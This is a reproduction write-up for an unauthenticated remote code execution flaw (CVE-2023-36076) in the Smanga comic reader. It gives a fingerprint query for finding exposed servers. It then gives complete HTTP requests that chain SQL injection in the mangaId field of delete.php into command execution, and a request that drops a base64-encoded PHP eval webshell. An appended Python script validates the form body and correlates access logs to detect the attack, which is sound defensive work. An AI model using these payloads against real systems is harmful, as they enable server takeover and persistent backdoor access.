# Smanga Unauthenticated Remote Code Execution Vulnerability (CVE-2023-36076)

# 1. Vulnerability Overview

Smanga is a comic streaming reader that needs no configuration and installs directly as a Docker image. Inspired by Emby and Plex, it was developed to meet comic-reading needs. The /php/manga/delete.php endpoint contains an unauthenticated remote code execution vulnerability: an attacker can execute arbitrary commands on the target host and gain control of the server.

# 2. Affected Versions

+ Smanga

# 3. Asset Fingerprinting

+ hunter: `web.title=="smanga"`
+ Fingerprint

![1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0.png](./img/6zH2rDbEXutDEKrx/1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0-384375.png)

# 4. Vulnerability Reproduction

```http
POST /php/manga/delete.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360

mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo `whoami` > 1.txt;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true
```

![1704896774471-f0fafe1c-b1a8-4039-b32b-dcc54e0e2d59.png](./img/6zH2rDbEXutDEKrx/1704896774471-f0fafe1c-b1a8-4039-b32b-dcc54e0e2d59-384132.png)

Retrieve the command output:

```http
GET /php/manga/1.txt HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
```

![1704896808454-1fdfd6bb-66bc-4487-8f91-e6b908e9efce.png](./img/6zH2rDbEXutDEKrx/1704896808454-1fdfd6bb-66bc-4487-8f91-e6b908e9efce-693600.png)

Write a webshell:

```http
POST /php/manga/delete.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360

mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo PD9waHAgY2xhc3MgR3c2UVBoNjYgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg4OTBhKXsgQGV2YWwoIi8qWjlZczlnSVY3MyovIi4kSDg5MGEuIi8qWjlZczlnSVY3MyovIik7IH19bmV3IEd3NlFQaDY2KCRfUkVRVUVTVFsneCddKTs/Pg== | base64 -d > 1.php;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true
```

Webshell path:

```http
/php/manga/1.php
```

![1704896888984-0b313d0c-dfd8-48a8-98e3-00edde806d77.png](./img/6zH2rDbEXutDEKrx/1704896888984-0b313d0c-dfd8-48a8-98e3-00edde806d77-383079.png)

> Updated: 2024-02-29 23:55:42
> Source:
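The reproduction above gives a defender two concrete handles: the `mangaId` form field of `/php/manga/delete.php` is expected to be a plain integer, and a successful exploit is followed by a GET for a freshly dropped `.txt` or `.php` file in the same `/php/manga/` directory. The following Python script is an added example written for this page, not code from Smanga or from the original author; it assumes an nginx/Apache "combined" access-log format and runs over constructed sample log lines embedded in the script. `is_valid_delete_body` is a request-body check suitable for a WAF or reverse-proxy rule, and `find_drop_and_fetch` correlates a POST to the delete endpoint with a later GET of a dropped file from the same source address.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Constructed sample access-log lines (combined log format assumed); the
# 203.0.113.7 sequence mirrors the POST-then-GET pattern shown in the write-up.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2024:14:24:04 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2024:14:24:10 +0000] "POST /php/manga/delete.php HTTP/1.1" 200 34 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2024:14:24:12 +0000] "GET /php/manga/1.txt HTTP/1.1" 200 5 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2024:14:24:30 +0000] "POST /php/manga/delete.php HTTP/1.1" 200 34 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2024:14:24:33 +0000] "GET /php/manga/1.php HTTP/1.1" 200 9012 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jan/2024:14:25:00 +0000] "POST /php/manga/delete.php HTTP/1.1" 200 34 "-" "Mozilla/5.0"
"""

DELETE_ENDPOINT = "/php/manga/delete.php"

# Combined log format: ip ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Any .txt or .php fetched from the directory that holds delete.php, other than
# delete.php itself, is treated as a possible dropped artifact.
DROPPED_FILE_RE = re.compile(r"^/php/manga/[^/?]+\.(?:txt|php)$")


def is_valid_delete_body(body: str) -> bool:
    """Return True only if the form body carries a purely numeric mangaId and a
    boolean-looking deleteFile; the injection in the write-up fails this check."""
    params = parse_qs(body, keep_blank_values=True)
    manga_id = params.get("mangaId", [""])[0]
    delete_file = params.get("deleteFile", ["false"])[0]
    return bool(re.fullmatch(r"\d+", manga_id)) and delete_file in ("true", "false")


def find_drop_and_fetch(log_text: str, window_seconds: int = 300):
    """Report (ip, path) pairs where a client that POSTed to the delete endpoint
    fetched a .txt/.php from /php/manga/ within window_seconds afterwards."""
    posts_by_ip = {}
    alerts = []
    window = timedelta(seconds=window_seconds)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse; keep the scan going
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        path = m["path"].split("?", 1)[0]
        if m["method"] == "POST" and path == DELETE_ENDPOINT:
            posts_by_ip.setdefault(m["ip"], []).append(ts)
        elif (m["method"] == "GET" and path != DELETE_ENDPOINT
              and DROPPED_FILE_RE.match(path) and m["status"] == "200"):
            earlier = posts_by_ip.get(m["ip"], [])
            if any(timedelta(0) <= ts - p <= window for p in earlier):
                alerts.append((m["ip"], path))
    return alerts


if __name__ == "__main__":
    print(is_valid_delete_body("mangaId=1&deleteFile=true"))
    print(is_valid_delete_body("mangaId=1 union select * from (select 1)a&deleteFile=true"))
    for ip, path in find_drop_and_fetch(SAMPLE_LOG):
        print(f"possible dropped artifact fetched by {ip}: {path}")
```

The body check rejects anything that is not a bare integer, which is the cheapest way to stop the `union select` payload before it reaches the application. The log correlation is useful after the fact: the write-up's sequence of a POST to `delete.php` and a GET for `1.txt` or `1.php` from the same client within seconds is exactly what the function flags, while the benign POST from `10.0.0.5` with no follow-up fetch produces no alert.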